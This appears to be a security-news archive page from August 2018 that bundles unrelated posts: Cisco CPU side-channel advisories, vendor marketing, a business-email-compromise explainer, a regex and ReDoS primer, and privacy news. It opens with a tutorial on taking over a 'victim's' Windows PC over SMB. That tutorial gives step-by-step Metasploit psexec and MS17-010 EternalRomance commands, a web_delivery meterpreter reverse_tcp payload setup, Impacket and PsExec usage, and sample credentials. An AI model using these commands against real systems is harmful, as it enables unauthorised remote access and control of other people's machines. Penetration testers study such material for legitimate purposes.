Monthly Archives: August 2018

Multiple ways to Connect Remote PC using SMB Port

In this article, we will learn how to connect with victim’s machine via SMB port 445, once you have collected username and password to your victim’s PC. To know how collect username and passwords to your remote host via SMB protocol click here and to understand what is SMB protocol, click here

Table of content

Exploiting Windows Server 2008 R2 via SMB through Metasploit inbuilt exploits:

  • Microsoft Windows Authenticated User Code Execution
  • Microsoft Windows Authenticated Powershell Command Execution
  • Microsoft Windows Authenticated Administration Utility
  • SMB Impacket WMI Exec

Third party Tools

  • Impacket (psexec)
  • Impacket (atexec)
  • Psexec exe
  • Atelier Web Remote Commander

Exploiting Windows 2007 via SMB through Metasploit inbuilt exploits:

  • MS17-010 EternalRomance SMB Remote code execution
  • MS17-010 EternalRomance SMB Remote command execution

Let’s Begin

Tested on: Winodows Server2008 R2

Attacking Machine: Kali Linux

Microsoft Windows Authenticated User Code Execution

This module uses a valid administrator username and password (or password hash) to execute an arbitrary payload. This module is similar to the “psexec” utility provided by SysInternals. This module is now able to clean up after itself. The service created by this tool uses a randomly chosen name and description.

msf > use exploit/windows/smb/psexec
msf exploit windows/smb/psexec) > set rhost
msf exploit(windows/smb/psexec) > set smbuser administrator
msf exploit(windows/smb/psexec) > set smbpass Ignite@123
msf exploit(windows/smb/psexec) > exploit


rhost –> IP of victim PC

smbuser –> username

smbpass –> password

Once the commands run you will gain a meterpreter session of your victim’s PC and so you can access it as you want.

Microsoft Windows Authenticated Powershell Command Execution

This module uses a valid administrator username and password to execute a powershell payload using a similar technique to the “psexec” utility provided by SysInternals. The payload is encoded in base64 and executed from the commandline using the –encoded command flag. Using this method, the payload is never written to disk, and given that each payload is unique, is less prone to signature based detection. A persist option is provided to execute the payload in a while loop in order to maintain a form of persistence. In the event of a sandbox observing PSH execution, a delay and other obfuscation may be added to avoid detection. In order to avoid interactive process notifications for the current user, the psh payload has been reduced in size and wrapped in a powershell invocation which hides the window entirely.

msf > use exploit/windows/smb/psexec_psh
msf exploit(windows/smb/psexec_psh) > set rhost
msf exploit(windows/smb/psexec_psh) > set smbuser administrator
msf exploit(windows/smb/psexec_psh) > set smbpass Ignite@123
msf exploit(windows/smb/psexec_psh) > exploit

Once again as the commands run you will gain a meterpreter sesion of victim’s PC. And therefore, you can do as you wish.

Microsoft Windows Authenticated Administration Utility

This module uses a valid administrator username and password to execute an arbitrary command on one or more hosts, using a similar technique than the “psexec” utility provided by SysInternals. Daisy chaining commands with ‘&’ does not work and users shouldn’t try it. This module is useful because it doesn’t need to upload any binaries to the target machine.

Thus first, in a new metasploit framework we had used web delivery module to get malicious dll code which we can use as an arbitrary command on host.

use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) > set target 3
msf exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set lhost
msf exploit(multi/script/web_delivery) > exploit

Copy the highlighted text for malicious dll code.

msf > use auxiliary/admin/smb/psexec_command
msf auxiliary(admin/smb/psexec_command) > set rhosts
msf auxiliary(admin/smb/psexec_command) > set smbuser administrator
msf auxiliary(admin/smb/psexec_command) > set smbpass Ignite@123
msf auxiliary(admin/smb/psexec_command) > set COMMAND [Paste above copied dll code here]
msf auxiliary(admin/smb/psexec_command) > exploit

As soon as we run psexec auxiliary we will get meterpreter session with as administrator.

SMB Impacket WMI Exec

This module is similar approach to psexec but executing commands through WMI.

msf > use auxiliary/scanner/smb/impacket/wmiexec
msf auxiliary(scanner/smb/impacket/wmiexec) > set rhosts
msf auxiliary(scanner/smb/impacket/wmiexec) > set smbuser administrator
msf auxiliary(scanner/smb/impacket/wmiexec) > set smbpass Ignite@123
msf auxiliary(scanner/smb/impacket/wmiexec) > set COMMAND systeminfo
msf auxiliary(scanner/smb/impacket/wmiexec) > exploit

Impacket for lets you execute processes on remote windows systems, copy files on remote systems, process their output and stream it back. It allows execution of remote shell commands directly with full interactive console without having to install any client software.

Now let’s install the Impacket tools from GitHub. You can get it from here. Firstly, clone the git, and then install the Impacket and then run to connect victim’s machine.

git clone
cd impacket/
python install
cd examples

Syntax: ./ [[domain/] username [: password] @] [Target IP Address]

./ SERVER/Administrator:Ignite@

Impacket for

This example executes a command on the target machine through the Task Scheduler service and returns the output of the executed command.

Syntax: / [[domain/] username [: password] @] [Target IP Address] [Command]

./ SERVER/Administrator:Ignite123@ systeminfo

As you can see below that a remote connection was established to the server and the command systeminfo was run on the Target server with the output of the command delivered on the Kali terminal.


Psexec.exe is software that helps us to access other computers in a network. This software directly takes us to the shell of the remote PC with advantage of doing nothing manually. Download this software from –>

Unzip the file once you have downloaded it. Go to you command prompt and type:

PsExec.exe\\ -u administrator -p Ignite@123 cmd

Here, –> is the IP of remote host

-u –> denotes username

-p –> denotes password

cmd –> to enter victim’s command prompt

Atelier Web Remote Commander

This is graphical software that let us gain control of victim’s PC that too quite easily.

Once you have open the software give the IP address of your victim’s PC in remote host box along with the username and password in their respective boxes. And then click on connect; the whole victim’s PC’s screen will appear on your Desktop and you will have pretty good view of what your victim is doing.

As you can observe we are having Screen of victim’s machine in front of us.

MS17-010 EternalRomance SMB Remote code Execution

Tested on: Winodows 2007 ultimate

Attacking Machine: Kali Linux

This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where primitive. This will then be used to overwrite the connection session information with as an Administrator session. From there, the normal psexec payload code execution is done. Exploits a type confusion between Transaction and WriteAndX requests and a race condition in Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a named pipe.

msf > use exploit/windows/smb/ms17_010_psexec
msf exploit(windows/smb/ms17_010_psexec) > set rhost
msf exploit(windows/smb/ms17_010_psexec) > set smbuser raj
msf exploit(windows/smb/ms17_010_psexec) > set smbpass 123
msf exploit(windows/smb/ms17_010_psexec) > exploit

MS17-010 EternalRomance SMB Remote Command Execution

This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where primitive. This will then be used to overwrite the connection session information with as an Administrator session. From there, the normal psexec command execution is done. Exploits a type confusion between Transaction and WriteAndX requests and a race condition in Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a named pipe.

Thus first, in a new metasploit framework we had used web delivery module to get malicious dll code which we can use as an arbitrary command on host.

use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) > set target 3
msf exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set lhost
msf exploit(multi/script/web_delivery) > exploit

Copy the highlighted text for malicious dll code.

msf > use auxiliary/admin/smb/ms17_010_command
msf auxiliary(admin/smb/ms17_010_command) > set rhosts
msf auxiliary(admin/smb/ms17_010_command) > set smbuser raj
msf auxiliary(admin/smb/ms17_010_command) > set smbpass 123
msf auxiliary(admin/smb/ms17_010_command) > set COMMAND [Paste above copied dll code here]
msf auxiliary(admin/smb/ms17_010_command) > exploit

As soon as we run psexec auxiliary we will get meterpreter session with as administrator.

In this way we can compromise victim’s machine remotely if we have login credential.

Happy Hacking!!!!

AuthorYashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contachere

The post Multiple ways to Connect Remote PC using SMB Port appeared first on Hacking Articles.

NBlog September 1 – outsider threat awareness module published

If “insiders” are defined as the organization’s employees, “outsiders” must be everyone else, right, all those who are not on the payroll?  In reality from any single organization’s perspective, a huge variety and number of people qualify as outsiders. 
‘We’ are completely outnumbered by ‘them’.
Leading on from August’s awareness coverage of insider threats, it’s time now to explore the information-related threats from outside the organization – both threatening outsiders and external threats that don’t involve malicious people, or indeed people, at all.
The scope of September's NoticeBored security awareness and training module includes external events, incidents, accidents and challenges that aren’t deliberate, targeted attacks by specific people or groups – supply chain interruptions, cloud service failures and Internet drop-outs for example are external threats to the business, as are more general, widespread or social issues such as climate change, infectious disease outbreaks and natural disasters.  We call these “outside threats”.
For completeness, the threats and risks arising from “inbetweenies” – neither insiders nor outsiders - were mentioned last month and are brought up again this month.  We’re talking about contractors, consultants, professional advisors, interns, temps and others.  Perhaps at some future point we should explore the inbetweeny threats in more depth.
By the way, the A-to-Z guide to outsider threats turned out to be 12 pages as predicted. It was a bit of a rush to prepare such a detailed awareness paper at the end of the month but I'm glad we did; I'm still thinking about offering it as a threat catalog to guide anyone trying to identify and understand their outsider threats.  Google finds a number of threat catalogs already but none I have found so far cover "outsider threats" as well as ours does. But then I wrote it, so I'm biased. I should probably let it cool off for a while, and maybe I should add "insider threats" as well to complete the set.

80 Percent of U.S. Adults Have Never Considered a Career in Cybersecurity

Don’t know what a penetration tester is? You’re not alone; more than 50 percent of U.S. adults surveyed by the University of Phoenix have never heard of pen testers or “White Hat” ethical hackers, among other cybersecurity job titles, and only about one in 10 survey respondents is “very familiar” with the 11 jobs in the industry queried in the survey.

CPU Side-Channel Information Disclosure Vulnerabilities: August 2018

5On August 14th, 2018, three vulnerabilities were disclosed by Intel and security researchers that leverage a speculative execution side-channel method referred to as L1 Terminal Fault (L1TF) that affects modern Intel microprocessors. These vulnerabilities could allow an unprivileged, local attacker, in specific circumstances, to read privileged memory belonging to other processes.

The first vulnerability, CVE-2018-3615, affects Intel SGX technology and is referred to by the researchers who discovered it as foreshadow. This vulnerability is not known to affect any Cisco devices as the Cisco devices do not utilize Intel SGX technology.

The second vulnerability, CVE-2018-3620, and the third vulnerability, CVE-2018-3646, are referred to as L1 Terminal Fault attacks by Intel. These two vulnerabilities affect multi-core processors that leverage Intel Hyper-Threading technology supporting Operating System, System Management Mode, and Virtualized workloads. Like the previously disclosed Spectre vulnerabilities, all three new vulnerabilities leverage cache-timing attacks to infer any disclosed data.

To exploit any of these vulnerabilities, an attacker must be able to run crafted or script code on an affected device. Although the underlying CPU and operating system combination in a product or service may be affected by these vulnerabilities, the majority of Cisco products are closed systems that do not allow customers to run custom code and are, therefore, not vulnerable. There is no vector from which to exploit them. Cisco products are considered potentially vulnerable only if they allow customers to execute custom code side-by-side with Cisco code on the same microprocessor.

A Cisco product that may be deployed as a virtual machine or a container, even while not directly affected by any of these vulnerabilities, could be targeted by such attacks if the hosting environment is vulnerable. Cisco recommends that customers harden their virtual environments, tightly control user access, and ensure that all security updates are installed. Customers who are deploying products as a virtual device in multi-tenant hosting environments should ensure that the underlying hardware, as well as the operating system or hypervisor, is patched against the vulnerabilities in question.

Although Cisco cloud services are not directly affected by these vulnerabilities, the infrastructure on which they run may be impacted. See the Affected Products section of this advisory for information about the impact of these vulnerabilities on Cisco cloud services.

Cisco will release software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.

This advisory is available at the following link:

Security Impact Rating: Medium
CVE: CVE-2018-3615,CVE-2018-3620,CVE-2018-3646

CPU Side-Channel Information Disclosure Vulnerabilities: May 2018

On May 21, 2018, researchers disclosed two vulnerabilities that take advantage of the implementation of speculative execution of instructions on many modern microprocessor architectures to perform side-channel information disclosure attacks. These vulnerabilities could allow an unprivileged, local attacker, in specific circumstances, to read privileged memory belonging to other processes.

The first vulnerability, CVE-2018-3639, is known as Spectre Variant 4 or SpectreNG. The second vulnerability, CVE-2018-3640, is known as Spectre Variant 3a. Both of these attacks are variants of the attacks disclosed in January 2018 and leverage cache-timing attacks to infer any disclosed data.

To exploit either of these vulnerabilities, an attacker must be able to run crafted or script code on an affected device. Although the underlying CPU and operating system combination in a product or service may be affected by these vulnerabilities, the majority of Cisco products are closed systems that do not allow customers to run custom code and are, therefore, not vulnerable. There is no vector to exploit them. Cisco products are considered potentially vulnerable only if they allow customers to execute custom code side-by-side with Cisco code on the same microprocessor.

A Cisco product that may be deployed as a virtual machine or a container, even while not directly affected by any of these vulnerabilities, could be targeted by such attacks if the hosting environment is vulnerable. Cisco recommends that customers harden their virtual environments, tightly control user access, and ensure that all security updates are installed. Customers who are deploying products as a virtual device in multi-tenant hosting environments should ensure that the underlying hardware, as well as operating system or hypervisor, is patched against the vulnerabilities in question.

Although Cisco cloud services are not directly affected by these vulnerabilities, the infrastructure on which they run may be impacted. Refer to the “Affected Products” section of this advisory for information about the impact of these vulnerabilities on Cisco cloud services. 

Cisco will release software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.

This advisory is available at the following link:

Security Impact Rating: Medium
CVE: CVE-2018-3639,CVE-2018-3640

CA Unified Infrastructure Management Hardcoded Credentials / Missing Authentication

CA Technologies Support is alerting customers to multiple potential risks with CA Unified Infrastructure Management. Multiple vulnerabilities exist that can allow an attacker, who has access to the network on which CA UIM is running, to run arbitrary CA UIM commands on machines where the CA UIM probes are running. An attacker can also gain access to other machines running CA UIM and access the filesystems of those machines. The first vulnerability, has a medium risk rating and concerns a hardcoded secret key, which can allow an attacker to access sensitive information. The second vulnerability has a medium risk rating and concerns a hardcoded passphrase, which can allow an attacker to access sensitive information. The third vulnerability has a high risk rating and concerns a lack of authentication, which can allow a remote attacker to conduct a variety of attacks, including file reading/writing. Affected versions include 8.5.1, 8.5, and 8.4.7.

Seamless Security for the Connected Consumer

Laptops, mobile phones, tablets, smart watches, and more are all often found in a modern user’s arsenal of personal devices. We rely on these devices for so many things – to wake us up, count calories, connect us to friends and loved ones, provide access to the web, the list goes on. We love our devices, that much is clear. But this love has almost become bittersweet due to growing concerns about how using these devices impact our privacy.

Not so long ago, cybersecurity was a distant idea for many of us. But big-name data breaches and attacks changed all of that. Dyn, WannaCry, and Equifax soon became household names, causing us to consider how we use connected devices, what exactly we connect to, and who we share their information with. As Kelly Sheridan, a reporter at Dark Reading, states “A few years ago, many people didn’t talk about cybersecurity or even pay much attention to it. These days, it’s a growing source of stress among consumers, who rely on several devices and businesses to protect their data.” Now, with cybersecurity making all of us anxious, the next question is, how can we enjoy the convenience of our personal devices while still remaining secure?

Staying connected doesn’t have to be a bittersweet experience. In fact, we can do a lot to empower ourselves and become security savvy. To remain protected anywhere we are connected, we can look to McAfee for a seamless, simple yet powerful security experience.

McAfee aims to make it easy for everyone to protect what matters most. We understand the complexity of managing multiple devices in our already busy lives. We understand that the last thing users need is a complex product for securing devices. Our focus at McAfee is to simplify digital protection by providing a seamless unified experience. So, whether you are at home, or out and about, McAfee’s protects your identity, your data, and your devices all with the same delightful, unified user experience powered by McAfee’s cloud. Our goal is to create an effortless onboarding experience and make it quick and easy to set up digital security for you and your entire family. Plus, you can manage it all from a simple mobile app so you can get notified when a new threat is discovered and receive tips for staying protected.

Now, you can rest assured that your identity and your digital privacy are protected with security that is effective, simple and meaningful. You will be able to use their devices anywhere and stay protected against any threat, on any network. With this approach, living a connected lifestyle no longer has to be bittersweet.

To learn more about consumer security and our approach to it, be sure to follow us at @McAfee and @McAfee_Home.

The post Seamless Security for the Connected Consumer appeared first on McAfee Blogs.

Threat Roundup for August 24-31

Today, as we do every week, Talos is giving you a glimpse into the most prevalent threats we’ve observed this week — covering the dates between Aug. 24 and 31. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, we will summarize the threats we’ve observed by highlighting key behavioral characteristics and indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center,, or

The most prevalent threats highlighted in this roundup are:

Continue reading

Senate Commerce Committee Members Rumored to be Discussing Online Privacy Bill

On August 29, 2018, Bloomberg Law reported that four Senate Commerce Committee members are discussing a potential online privacy bill. The bipartisan group consists of Senators Jerry Moran (R-KS), Roger Wicker (R-MS), Richard Blumenthal (D-CT) and Brian Schatz (D-HI), according to anonymous Senate aides.

Specific details of the possible bill are unknown. The proposal may compete with a bill being developed by Senate Commerce Committee Chairman John Thune (R-SD), and is a further indication of increased Congressional interest in enacting a broad online privacy bill. Such interest sharpened in a year of increased scrutiny and legal developments in the privacy arena, including the European Union’s General Data Protection Regulation and the recently enacted California Consumer Privacy Act of 2018.

Alongside these reported Congressional efforts, the Trump Administration, through the National Economic Council and the Commerce Department, is said developing an online privacy proposal to send to Congress.

Firefox to auto-block ad trackers

Mozilla this week said that its Firefox browser will soon start to automatically block some ad tracking technologies that the company claimed impact page load performance and shadow users wherever they go.

"In the near future, Firefox will — by default — protect users by blocking tracking," wrote Nick Nguyen, Mozilla's top Firefox executive, in an August 30 post to a company blog.

Mozilla added what it dubbed "Tracking Protection" to Firefox 57, a.k.a. "Quantum," last fall. Since then, the feature has remained opt-in, meaning people must manually enable it from the browser's Preferences display if they want to use it. When switched on, Tracking Protection blocks a wide range of content, not just advertisements but also in-page trackers that sites or ad networks implant to follow users from one website to another. Such trackers are the reason why an ad for underwear from a specific vendor seemingly pops up wherever one goes after one has browsed the underwear selection at the seller's website.

To read this article in full, please click here

The Economic Growth, Regulatory Relief and Consumer Protection Act: What Parents Should Know

When we think about credit cards, we usually think of our own – what we use them for, how our credit is doing, and most importantly, that they remain in our hands and not in that of a cybercriminal. But something many parents forget – the cyberthreats that could potentially impact our financial information could very well impact our children’s, given they have credit cards of their own. As a matter of fact, there’s a new law that helps parents with exactly that – protecting their kids’ credit, amongst a few other things. It’s called the Economic Growth, Regulatory Relief and Consumer Protection Act, and it takes effect on September 21st of this year.

So, what does this law mean for parents and their kids? With this law, free credit freezes will be available for anyone – including children under the age of 16 – in the country (currently, there may be fees depending on state laws). That way, if a cybercriminal tries to open up an account with a minor’s information, the impacted family can freeze that account immediately. Additionally, it will extend fraud alerts from 90 days to a full year.

As a result of this law, Equifax, Experian, and TransUnion will each set up a web page for requesting fraud alerts and credit freezes. The FTC will also post links to those web pages on

So, with this law coming into effect in no time, what next steps should parents take to reap its benefits? Start by following these tips:

  • Find out if your child has a credit report. First and foremost, head here and go to the ‘Child Identity Theft’ section. It will have instructions on how to find out if your child has a credit report. Most young children shouldn’t have credit files, but if they do, the page includes contact information for credit agencies and advice on how to freeze credit.
  • Keep the record of freezes in a safe place. If you do have to freeze a credit report, keep the records stored in a safe place. Make sure your family can find it when needed, and a crook can’t access it.
  • Invest in an identity theft monitoring and recovery solution. The best way to protect you or a family member from identity theft is by being proactive. That’s precisely why you should leverage a solution tool such as McAfee Identity Theft Protection, which allows users to take a proactive approach to protecting their identities with personal and financial monitoring and recovery tools to help keep their identities personal and secured.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post The Economic Growth, Regulatory Relief and Consumer Protection Act: What Parents Should Know appeared first on McAfee Blogs.

BEC is Big Business for Hackers: What makes these attacks so hard to prevent?

For years, one of the most lucrative ways for hackers to generate profits was through ransomware attacks. These instances involve the use of strong encryption to lock victims out of their files and data – attackers then sell the decryption key in exchange for an untraceable Bitcoin ransom payment.

Now, however, another highly profitable attack style is emerging, particularly within the enterprise sector.

Business Email Compromise, or BEC, is creating considerable opportunities for cybercriminals to make money off of their malicious activity, and the sophistication and urgency of these infiltrations make them particularly difficult to guard against.

The rise of BEC

Although organizations are now becoming increasingly aware of the BEC attack approach, this strategy has actually been generating income for hackers for years now. Trend Micro researchers reported that, in 2016, attackers generated an average of $140,000 in losses by launching BEC attacks on businesses across the globe.

In the past, BEC was known as a “man-in-the-email” scam, in which hackers leverage legitimate-looking emails to support bogus wire transfers from enterprise victims. As Trend Micro researchers pointed out, these attacks can come in an array of different styles, including fraudulent invoices, attacks on the company CEO, account compromise or impersonation, and even traditional data theft.

Judging by the level of profit hackers have been able to generate, supported by the successful attacks they’ve been able to pull off, chances are good that BEC will only continue its rise in the near future.

How big of a business is BEC?

Whereas hackers caused an average of $140,000 in business losses two years ago, cybercriminals who leverage BEC schemes have been able to increase their potential for profit since then.

In July 2018, the FBI’s Internet Crime Complaint Center reported a 136 percent rise in losses related to BEC attacks, specifically between December 2016 and May 2018. Overall, this means 

hackers have raked in a total of $12.5 billion in company BEC losses, spanning both international and domestic attacks. The sheer amount of loss – and profit on the side of hackers – is $3 billion higher than the prediction Trend Micro researchers made in our Paradigm Shifts: Security Predictions for 2018 report.

Fueling BEC: What makes these attacks difficult to guard against?

An increase in successful attacks translates to a rise in profits on the part of hackers, and a larger number of affected business victims. Due to this environment landscape, it’s imperative that enterprise decision-makers and IT stakeholders not only understand that these attacks are taking place, but that they also boost their awareness of the challenges in protection. In this way, businesses can take proactive action to better protect their email systems, critical data, finances and other assets.

Let’s examine a few of the factors that contribute to the difficulties in protecting against BEC attacks:

Sophisticated use of social engineering

In the instances of BEC, hackers don’t just craft a catch-all email with common language and hope it dupes their target. Instead, they take their time to complete sophisticated social engineering. In this way, they are able to use an attack style that will boost their chances of the target opening and responding to the message.

Specially-crafted email

Thanks to the robust social engineering involved, cybercriminals can create incredibly legitimate-looking emails that include targets’ names, and can even appear to be from others within the organization. For example, an accountant may receive a fraudulent email request for a wire transfer from the company CEO, which includes a spoofed version of the CEO’s email address and even the CEO’s own email signature. Accordingly, he or she will be more likely to send the funds, because the email appears very real.

Lack of malicious links or attachments

While hackers’ background and foundational effort is in-depth and sophisticated, the process of delivery is surprisingly simple. BEC attacks rely on a convincing email with a strong message, meaning that the normal red flags used to identify a potential attack are lacking.

“Because these scams do not have any malicious links or attachments, they can evade traditional solutions,” Trend Micro pointed out.

Sense of urgency in the message

In addition to leveraging social engineering to include legitimate names, addresses and other details to fool victims, hackers also include a strong sense of urgency in BEC messages to encourage a successful attack. Many messages analyzed by Trend Micro researchers were found to include powerful language like “urgent,” “payment,” “transfer,” “request,” and other words that can support the overall message.

“The sense of urgency, a request for action, or a financial implication used in BEC schemes tricks targets into falling for the trap,” Trend Micro explained. “For instance, a cybercriminal contacts either the employees and/or executives of the company and pose as either third-party suppliers, representatives of law firms or even chief executive officers (CEOs), manipulating the targeted employee/executive into secretly handling the transfer of funds.”

Business Email Compromise attacks involve social engineering and strong language.

Array of different styles to appeal to different victims

In addition, the fact that attackers have established a wide variety of different attack styles means they can utilize the one that will be most successful with their target, based on their social engineering research. For instance, a hacker who wants to attack a company CEO could pose as a third-party vendor requiring payment for an overdue invoice. An attacker looking to launch an attack on a company that may not commonly use outside vendors, and thus may not fall for that approach, could pose as an internal HR employee needing personally identifiable data.

With so many different styles available, hackers have a veritable playbook to choose from and can craft the most legitimate message which will support the chances of successful fraud and attack.

Further leveraging a compromised account: Continuing the cycle

Finally, and unfortunately, the BEC cycle doesn’t have to end after a fraudulent wire transfer has been made by the victim. Once an account has been compromised, it can be leveraged to support further BEC schemes, sending phishing or other BEC messages to others within the compromised account address book.

Hackers are also positioning victims as “money mules,” according to the FBI IC3’s report. These are victims, recruited through romance or blackmail scams, that hackers use to open new accounts to leverage for BEC. While these accounts may only remain open for a short time, they provide additional, malicious opportunities for attackers.

Security experts don’t believe BEC attacks will diminish anytime in the near future. In addition to user awareness, enterprises should leverage advanced security solutions to prevent BEC intrusions. Technology from Trend Micro, which utilizes advanced strategies like artificial intelligence to detect email impersonators and machine learning to strengthen overall security, can be beneficial assets.

To find out more about how to guard against BEC within your enterprise, connect with the experts at Trend Micro today.

The post BEC is Big Business for Hackers: What makes these attacks so hard to prevent? appeared first on .

Playbook Fridays: Document Parsing and Keyword Scanning/Tagging

Automatically tag the documents with keywords and focused areas of interest without human intervention

ThreatConnect developed the Playbooks capability to help analysts automate time consuming and repetitive tasks so they can focus on what is most important. And in many cases, to ensure the analysis process can occur consistently and in real time, without human intervention.

This Playbook is actually a set of 3 playbooks: one that saves the keyword, one that is used to verify the data is saved and what the analyst expected; and the last one that actually performs the work.

Many customers have reached out and voiced frustration because analysts were spending a lot of time looking over various reports for specific keywords and then manually applying tags based upon those keywords. This act was getting very time consuming; especially for one customer, who had 10 separate focus areas with more than 200 different keywords.

With this Playbook set, analysts can automatically tag the documents with keywords and focused areas of interest without human intervention, saving the analyst about 4-5 hours/week.

This Playbook set is triggered with the creation of a document in a source (with a specific tag "parseme" that can be removed as requirement after verifying expected functionality). First, you can set the list of keywords from the datastore contained within ElasticSearch. Then, in JSON, you define a set of keywords and have them grouped and save them as variables. The main Playbook converts the document into a set of strings that is then passed onto the regex capture groups for comparison. For those keywords that match the Playbook, it will create the tag for the group, ie: China/Russia. Additionally, the Playbook will tag the document with the actual keywords within those that match, ie: APT12/APT28 etc.


1)  Import "Populate DataStore with Keywords.pbx"
In this Playbook you set a JSON array with your keywords. There are a few examples already preconfigured out of the box to get you started. This playbook only needs to be ran once to populate the datastore (and any other time the list needs to be updated).

Populate DataStore with Keywords


2) Import Document Keyword Check.pbx
This playbook will need to be set to a specific owner to monitor, and as a safety measure, is currently configured to fire off the tag "parseme". After verifying functionality this tag requirement can be omitted so that it runs each time a document is created.

Document Keyword Check

The post Playbook Fridays: Document Parsing and Keyword Scanning/Tagging appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

Explained: regular expression (regex)

Regular expression, or “regex” for short, is a mathematical term for the theory used to describe regular languages. But in computing, regexes are used to search for patterns in files and databases, and their functionality is incorporated into many modern programming languages. Regex search patterns make wildcards look like clumsy clowns because they offer a whole slew of additional options.

Regex overview

The simplest and most common method of searching is to look for a specific string or character in a text file, for example, by using F3 on a website. This is basically what you use when you apply the “Search” or “Search and Replace” functions in Notepad.

Like we said, regex can do a lot more. But to achieve this, a few special characters have to be defined. It is good to know these so-called meta characters because syntax errors are the most common cause for failed searches.

The most used special characters are:

Square brackets []

Square brackets are used to specify a character set—at least one of which must be a match, but no more than one unless otherwise specified.

Example: Malwareb[yi]es will be a match for Malwarebytes and Malwarebites, not for Malwarebyites.

The minus sign –

The minus sign or hyphen is used to specify a range of characters.

Example: [0-9] will be a match for any single digit between 0 and 9.

Curly brackets {}

Curly brackets are used to quantify the number of characters.

Example: [0-9]{3} matches for any number sequence between 000 and 999

Parentheses ()

Parentheses are used to group characters. Matches contain the characters in their exact order.

Example: (are) gives a match for malware, but not for aerial because the following order of the characters is different from the specification.

Slash |

The slash, as in many languages, stands for the logical “or” operator.

Example: Most|more will be a match for both of the specified words.

Period .

The dot or period acts as a wildcard. It matches any single character, except line break characters.

Example: Malwareb.tes will be a match for Malwarebytes, Malwarebites, Malwarebotes, and many others, but still not for Malwarebyites.

Backslash \

The backslash is used to escape special characters and to give special meaning to some characters that follow it.

Examples: \d matches for one whole number (0 – 9).

\w matches for one alphanumeric character.

Asterisk *

The asterisk is a repeater. It matches when the character preceding it matches 0 or more times.

Example: cho*se will match for chose and choose, but also for chse (zero match).

Asterisk and period .*

The asterisk is used in combination with the period to match for any character 0 or more times.

Example: Malware.* will match for Malware, Malwarebytes, and any misspelled version that starts with Malware.

Plus sign +

The plus sign matches when the character preceding + matches 1 or more times.

Example: cho+se will match for chose and choose, but not for chse.

There are quite a few more meta characters, but it is outside the scope of this post to explain them all in detail. For those interested, there are many basic and advanced regex tutorials available. One of them will certainly fit your specific wishes.

Responsible use

Sophisticated regexes look intimidating and confusing at first sight, but once you have constructed a few yourself, you will start recognizing what others have tried to accomplish—especially if you take them apart one piece at a time. But we do advise caution when using your own regexes on public-facing servers or apps. An inexperienced publisher could be digging his own grave by doing so.

For most common tasks, there are many examples to be found on code repositories like GitHub. But you will have to choose carefully and ask yourself:

  • Security-wise, is it safe to use in production?
  • Is it well maintained? Does it get updated regularly, or will that become your future task?

The more contributors, the better is the rule of thumb here. More contributors mean not only more eyes that check for vulnerabilities, but also more people writing new code and improving existing code.


As in many other programming languages, regex can be used in JavaScript as well. This capability is nice, but also poses a problem that has been known for several years. The first paper mentioning the possibilities of a regular expression denial of service (ReDoS) stems from 2012.

Basically, an attacker can prepare a specially-crafted and/or lengthy piece of text that he feeds into an input field of a JavaScript-based web server or app. Since JavaScript does not run multi-threaded, the targeted server or app is busy running its regex functions on the text. While it is doing that, it is unable to perform any other tasks, so the server or app will appear to be frozen. Other languages will take a long time to deal with such texts as well, but if they are multi-threaded, other requests can be dealt with at the same time and won’t have to wait until the regex functions are done processing the text.

Since it is not hard to figure out, or in some cases, it’s well-known what regexes will be performed, it is relatively easy to craft a text that will keep an unprotected server occupied for up to a few minutes.

For example, many servers use Node.js, a JavaScript runtime that has quite a few documented ReDoS vulnerabilities.

In other cases, attackers can search for so-called “evil regexes.” What makes a regex stand out as evil?

  • The regular expression applies repetition (“+”, “*”) to a complex subexpression.
  • For the repeated subexpression, there exists a match that is also a suffix of another valid match.

Prevention of ReDoS attacks

To prevent becoming a victim of a ReDoS attack, it is not enough to rely on the built-in security of the regex. Here are some tips:

  • Use atomic grouping in your regex. An atomic group is a group that, when the regex engine exits from it, automatically throws away all backtracking positions remembered by any tokens inside the group.
  • Keep tabs on your regexes. When a regex takes much longer then it should, kill it at once. You can inform the user that it was stopped for this reason and as a security measure.
  • Validate your input, and don’t allow users to use their own regexes. If there is no other way, then pre-format the regexes and only allow certain minimal deviations.
  • Only write your own regexes for production servers and apps if there are no other known reliable sources available.
  • Use one of the verification packages that are available for regexes to have your regex checked for vulnerabilities.

Popular does not equal safe

Even though Node.js is an immensely popular JavaScript runtime, it is not enough to rely on the security it provides. And even though regexes can be useful tools, using them should come with some precautions. Reportedly, there has been an uptick in web apps and servers that have been under ReDos attacks lately.


Understanding ReDoS Attack

JavaScript Web Apps and Servers Vulnerable to ReDoS Attacks

How a RegEx can bring your Node.js service down

Stay safe!

The post Explained: regular expression (regex) appeared first on Malwarebytes Labs.

This Week in Security News: Air Canada and Cryptojacking

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, Air Canada reported a data breach that exposed passport details for more than 20,000 customers on their mobile app. Also, Trend Micro’s Midyear Security Roundup reported an increase in cryptojacking and a decrease in ransomware attacks.

Read on:

Cybercriminals Changing Tactics as Seen in First Half Report

Trend Micro has seen a shift from large ransomware spam campaigns to more targeted attacks using ransomware as the tool to disrupt critical business operations.

The Urpage Connection to Bahamut, Confucius and Patchwork

